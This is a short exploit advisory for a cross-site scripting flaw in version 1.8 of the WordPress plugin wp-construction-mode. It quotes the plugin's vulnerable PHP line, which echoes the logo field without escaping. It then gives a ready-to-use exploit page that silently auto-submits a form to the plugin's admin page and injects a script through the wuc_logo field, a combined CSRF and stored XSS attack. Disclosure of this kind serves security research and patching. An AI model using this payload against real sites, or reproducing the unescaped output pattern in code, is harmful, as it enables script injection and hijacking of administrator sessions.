######################
# Exploit Title : Wordpress wp-construction-mode.1.8 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org/plugins/wp-construction-mode

# Software Link :  
http://downloads.wordpress.org/plugin/wp-construction-mode.1.8.zip

# Date : 2014-06-27

# Tested on : Windows 7 / Mozilla Firefox
######################

# Location : http://localhost/wp-admin/admin.php?page=under-construction.php

######################

# Vulnerable code :

<td><?php _e('Logo') ?></td>
<td>
<input type="text" name="wuc_logo" value="<?php echo $wuc_logo ?>"  
placeholder="<?php _e('Enter image path/url or leave blank for no  
logo'); ?>"/>
</td>
</tr>


######################

Exploit Code:

<html>
<body>
<form name="post_form" method="post"  
action="http://localhost/wp-admin/admin.php?page=under-construction.php"  
enctype="multipart/form-data">
<input type="hidden" name="wuc_logo" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
<input type="hidden" name="act" value="save" />
</form>
</body>
</html>

#####################

Discovered By : ACC3SS

#####################